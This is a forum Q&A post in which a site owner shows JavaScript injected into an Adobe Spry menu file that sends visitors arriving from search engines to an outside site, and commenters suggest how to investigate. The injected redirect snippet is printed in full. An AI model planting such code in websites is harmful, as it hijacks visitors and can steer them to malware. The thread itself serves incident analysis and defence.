# Semi Malicious Code added to a .js page, how and what else to look for

Tags: javascript, security, web

the following code was added to the sprymenubar.js that is an Adobe product.

```
var regexp=/\(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href="http://authtea.com/";
}
```

I have checked out "authtea.com" and can't find anything other than a place that sells Authentic Chinese Tea.  But it is disturbing that TEA is also an acronym for Tiny Encryption Algorythm.  I have searched for evidence of any other file changed or anything identifying the TEA and can't find anything.  I also did a view source on the home page of authtea.com and couldn't see anything I thought was amiss.

1 how could someone have gotten it there?
2 What else should I look for?

Comment: May I suggest that you add the security tag to your question? It might get the attention of the right people.

Comment: Clearly the source from which you got the js has been compromised. If you have an authentic copy of `sprymenubar.js`, you can do a file comparison between the two.

Comment: `Malicious software includes 20 exploit(s), 5 scripting exploit(s), 2 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.` You got a serious problem of security inside your server, same for the people who are opening your script, reported to avast exploit : https://forum.avast.com/index.php?topic=59191.0, you have to check your logs, check all you html form ajax calls, the most important upload form, check your api and lib using including social networking, look at  obfuscated code, base64, inside js, or PHP ASP JSP ... files. gl :(